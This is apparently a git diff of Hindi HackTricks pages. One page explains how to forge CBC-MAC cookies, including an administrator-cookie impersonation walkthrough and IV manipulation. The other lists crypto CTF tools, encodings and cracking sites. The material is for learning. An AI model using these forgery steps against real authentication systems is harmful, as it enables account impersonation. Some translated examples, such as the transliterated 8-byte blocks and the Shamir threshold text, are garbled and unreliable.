रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता।
|
||||
**साइफर ब्लॉक चेनिंग मैसेज प्रमाणीकरण कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अपूर्व परिवर्तन होगा। इस परिवर्तन को बनाने या उलटने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करती है।
|
||||
|
||||
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ:
|
||||
संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ ब्लॉकों से बने संदेश![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) की CBC-MAC की गणना की गई है:
|
||||
|
||||
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
|
||||
# सुरक्षा दोष
|
||||
|
||||
|
@ -33,49 +34,50 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क
|
|||
* `E(m1 XOR 0) = s1`
|
||||
* `E(m2 XOR 0) = s2`
|
||||
|
||||
फिर m1 और m2 को जोड़कर बनाया गया संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा:
|
||||
फिर, m1 और m2 को जोड़कर बनाए गए संदेश (m3) 2 हस्ताक्षर (s31 और s32) उत्पन्न करेगा:
|
||||
|
||||
* `E(m1 XOR 0) = s31 = s1`
|
||||
* `E(m2 XOR s1) = s32`
|
||||
|
||||
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।**
|
||||
**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।**
|
||||
|
||||
सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं:
|
||||
सोचिए आप **8 बाइट** ब्लॉक में नाम **व्यवस्थापक** को एन्क्रिप्ट कर रहे हैं:
|
||||
|
||||
* `Administ`
|
||||
* `rator\00\00\00`
|
||||
* `एडमिनिस्ट`
|
||||
* `रेटर\00\00\00`
|
||||
|
||||
आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
|
||||
फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
|
||||
अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं।
|
||||
आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\
|
||||
फिर, आप `रेटर\00\00\00 XOR s1` के परिणाम के नाम को बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\
|
||||
अब, आप s32 का उपयोग **व्यवस्थापक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं।
|
||||
|
||||
### सारांश
|
||||
|
||||
1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
|
||||
2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.**
|
||||
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी।
|
||||
1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है
|
||||
2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**।**
|
||||
3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **व्यवस्थापक** के लिए एक मान्य कुकी होगी।
|
||||
|
||||
# हमला नियंत्रण IV
|
||||
|
||||
यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\
|
||||
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
|
||||
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी।
|
||||
यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करने के लिए आप उपयोगकर्ता "**व्यवस्थापक**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\
|
||||
अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **व्यवस्थापक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **व्यवस्थापक** उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी।
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
अधिक जानकारी के लिए [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) में देखें।
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# क्रिप्टो सीटीएफएस ट्रिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## ऑनलाइन हैश डेटाबेस
|
||||
|
||||
|
@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
|
||||
## जादू ऑटोसॉल्वर्स
|
||||
## मैजिक ऑटोसॉल्वर्स
|
||||
|
||||
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल)
|
||||
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
|
||||
## एन्कोडर्स
|
||||
|
||||
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डीकोड किया जा सकता है:
|
||||
अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है:
|
||||
|
||||
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
### बेस एन्कोडिंग्स ऑटोसॉल्वर
|
||||
|
||||
इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
|
||||
* **एस्की85**
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **बेस26** \[_A-Z_]
|
||||
* `BQEKGAHRJKHQMVZGKUXNT`
|
||||
* **बेस32** \[_A-Z2-7=_]
|
||||
* `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
* `pbzsaamdcf3gna5xptoo====`
|
||||
* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_]
|
||||
* `e1rqssc3d5t62svgejhh====`
|
||||
* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_]
|
||||
* `D1QPRRB3C5S62RVFDHGG====`
|
||||
* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_]
|
||||
* `D1NMOOB3C5P62ORFDHGG====`
|
||||
* **बेस45** \[_0-9A-Z $%\*+-./:_]
|
||||
* `59DPVDGPCVKEUPCPVD`
|
||||
* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
* `2yJiRg5BF9gmsU6AC`
|
||||
* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
* `2YiHqF5bf9FLSt6ac`
|
||||
* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
* `pyJ5RgnBE9gm17awU`
|
||||
* **बेस62** \[_0-9A-Za-z_]
|
||||
* `g2AextRZpBKRBzQ9`
|
||||
* **बेस64** \[_A-Za-z0-9+/=_]
|
||||
* `aG9sYWNhcmFjb2xh`
|
||||
* **बेस67** \[_A-Za-z0-9-_.!\~\_]
|
||||
* `NI9JKX0cSUdqhr!p`
|
||||
* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `<~BQ%]q@psCd@rH0l~>`
|
||||
* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
* `Xm4y`V\_|Y(V{dF>\`
|
||||
* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
* `Xm4y|V{~Y+V}dF?`
|
||||
* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
* `frDg[*jNN!7&BQM`
|
||||
* **बेस100** \[]
|
||||
* `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
* **बेस122** \[]
|
||||
* `4F ˂r0Xmvc`
|
||||
* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* **ESAB46** \[]
|
||||
* **एसएबी46** \[]
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* **MEGAN45** \[]
|
||||
* **मेगान45** \[]
|
||||
* `kLD8igSXm2KZlwrX`
|
||||
* **TIGO3FX** \[]
|
||||
* **टिगो3एफएक्स** \[]
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* **TRIPO5** \[]
|
||||
* **त्रिपो5** \[]
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* **FERON74** \[]
|
||||
* **फेरोन74** \[]
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* **GILA7** \[]
|
||||
* **गिला7** \[]
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* **Citrix CTX1** \[]
|
||||
* **सिट्रिक्स सीटीएक्स1** \[]
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_]
|
||||
### हैकराइज़एक्स \[_╫Λ↻├☰┏_]
|
||||
```
|
||||
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
|
||||
```
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### मोर्स
|
||||
```
|
||||
|
@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk
|
|||
```
|
||||
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
|
||||
|
||||
### ASCII85
|
||||
### एएससीआई85
|
||||
```
|
||||
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
|
||||
```
|
||||
|
@ -196,14 +150,14 @@ drnajapajrna
|
|||
```
|
||||
### अफाइन गुप्ताक्षर एन्कोड
|
||||
|
||||
पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें
|
||||
अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें
|
||||
```
|
||||
krodfdudfrod
|
||||
```
|
||||
### एसएमएस कोड
|
||||
|
||||
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
|
||||
उदाहरण: 2=A, 22=B, 222=C, 3=D...\
|
||||
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा पुनरावृत्त अंकों द्वारा परिभाषित किया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
|
||||
उदाहरण के लिए: 2=A, 22=B, 222=C, 3=D...\
|
||||
आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे।
|
||||
|
||||
आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
|
||||
|
@ -221,21 +175,21 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
|
|||
|
||||
## संक्षेपण
|
||||
|
||||
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं।
|
||||
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं।
|
||||
|
||||
## सरल क्रिप्टो
|
||||
## सरल एन्क्रिप्शन
|
||||
|
||||
### XOR - ऑटोसॉल्वर
|
||||
|
||||
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
|
||||
|
||||
### Bifid
|
||||
### बिफिड
|
||||
|
||||
एक कीवर्ड की आवश्यकता है
|
||||
```
|
||||
fgaargaamnlunesuneoa
|
||||
```
|
||||
### वीजेनेर
|
||||
### विजेनेर
|
||||
|
||||
एक कुंजीशब्द की आवश्यकता है
|
||||
```
|
||||
|
@ -261,7 +215,7 @@ Key:
|
|||
|
||||
### समीर सीक्रेट शेयरिंग
|
||||
|
||||
एक रहस्य को X भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको Y भागों की आवश्यकता होती है (_Y <=X_).
|
||||
एक रहस्य को एक्स भागों में विभाजित किया जाता है और इसे पुनर्प्राप्त करने के लिए आपको व्यक्तिगत भागों की आवश्यकता होती है (_व्यक्तिगत भागों की संख्या <= एक्स_).
|
||||
```
|
||||
8019f8fa5879aa3e07858d08308dc1a8b45
|
||||
80223035713295bddf0b0bd1b10a5340b89
|
||||
|
@ -269,27 +223,28 @@ Key:
|
|||
```
|
||||
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
|
||||
|
||||
### OpenSSL brute-force
|
||||
### OpenSSL ब्रूट-फोर्स
|
||||
|
||||
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
|
||||
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
|
||||
|
||||
## Tools
|
||||
## उपकरण
|
||||
|
||||
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
|
||||
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
|
||||
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,21 +1,22 @@
|
|||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
